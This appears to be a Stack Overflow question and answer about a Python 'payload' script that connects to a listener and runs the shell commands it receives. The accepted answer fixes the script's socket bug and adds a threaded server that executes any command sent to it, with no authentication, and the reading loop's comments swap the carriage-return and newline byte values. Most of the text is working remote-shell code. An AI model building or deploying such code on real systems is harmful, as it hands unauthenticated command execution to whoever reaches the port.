# TypeError: 'socket' object is not iterable

Tags: python, python-3.x, sockets, subprocess

I was trying to make a program that executes system commands on other systems. Getting this error when I give commands to execute on the terminal.

```
import socket
import subprocess
payload = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
payload.connect(("localhost",4444))
print("Successfully, Connected..!!")

while True:
    cmd = payload.recv(2048)
    if cmd == 'exit':
        payload.close()
        break
    cmd = cmd.decode('utf-8')
    output = subprocess.check_output(payload, shell=True)
    payload.send(output)
```

the output is this

```
Traceback (most recent call last):
  File "C:\Users\Wasii\Desktop\python-payload\payload.py", line 13, in <module>
    output = subprocess.check_output(payload, shell=True)
  File "C:\Users\Wasii\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 420, in check_output
    return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
  File "C:\Users\Wasii\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 501, in run
    with Popen(*popenargs, **kwargs) as process:
  File "C:\Users\Wasii\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 966, in __init__
    self._execute_child(args, executable, preexec_fn, close_fds,
  File "C:\Users\Wasii\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 1375, in _execute_child
    args = list2cmdline(args)
  File "C:\Users\Wasii\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 561, in list2cmdline
    for arg in map(os.fsdecode, seq):
TypeError: 'socket' object is not iterable
```

Comment: Voting to close as typo: `payload` should be `cmd`.

Answer (score 0, accepted):

You nned to be passing `cmd` to `subprocess.check_output`, not `payload`.

This is how I would code the server in order to handle multiple concurrent clients:

```py
import socketserver
import subprocess

HOST = '127.0.0.1'
PORT = 4444

class MyHandler(socketserver.StreamRequestHandler):
    def handle(self):
        while True:
            cmd = self.request.recv(2048).strip() # get rid of trailing newline if present:
            cmd = cmd.decode('utf-8')
            if cmd == 'exit':
                break
            output = subprocess.check_output(cmd, shell=True)
            self.request.sendall(output)

try:
    with socketserver.ThreadingTCPServer((HOST, PORT), MyHandler) as server:
        print('Hit CTRL-C to terminate...')
        server.serve_forever()
except KeyboardInterrupt:
    print('Terminating.')
```

**Update**

Per the comment made by AKX, if you are concerned that the complete command may not be received in a single call to `socket.socket.recv`, then you can have a convention that the command must be terminated by a special "end-of-command" character. You then read the input one byte at a time assembling the command until you see the "end-of-command" character. In the example below we set the end-of-command character to be a newline, which may optionally be preceded by a carriage return. In this way we can test on Windows or Linux using a telnet client:

```py
import socketserver
import subprocess

HOST = '127.0.0.1'
PORT = 4444

class MyHandler(socketserver.StreamRequestHandler):
    def handle(self):
        while True:
            buf = []
            # Command ends with a newline optionally preceded by a carriage return
            # Accumulate byte stings until a newline is seen:
            while True:
                bytestring = self.request.recv(1)
                if bytestring[0] == 10: # carriage return?
                    continue
                if bytestring[0] != 13: # newline?
                    buf.append(bytestring)
                else:
                    break # We have seen the end-of-command character
            # Assemble all the 1-byte strings
            cmd = b''.join(buf).decode('utf-8')
            if cmd == 'exit':
                break
            output = subprocess.check_output(cmd, shell=True)
            self.request.sendall(output)

try:
    with socketserver.ThreadingTCPServer((HOST, PORT), MyHandler) as server:
        print('Hit CTRL-C to terminate...')
        server.serve_forever()
except KeyboardInterrupt:
    print('Terminating.')
```

Comment: It should be noted that blindly receiving up to 2048 bytes from a stream socket could result in a short read (if not all bytes sent by the other end are available), or a partial message being read. For a serious application, you will need some encapsulation of messages within the stream.

Comment: I have updated the answer to provide code to handle the situation that a single recv call may not return the entire input command.

Comment: Nice, that's better :) For efficiency, I'd personally larger reads into a byte buffer and just `partition` to see if we'd seen a delimiter character, and keep the possible partial command on the other end of `partition` for the next command's initial buffer...

Comment: Ideally, you are not using telnet but a custom client that can prefix the command with the length. See [my answer here](https://stackoverflow.com/questions/73627107/sending-multiple-images-using-socket-python-get-sent-as-one-to-client#73637000).

Comment: Yep, a TLV-style encoding would be better. Coincidentally, I just answered a [similar question today with TLV](https://stackoverflow.com/a/73947097/51685)...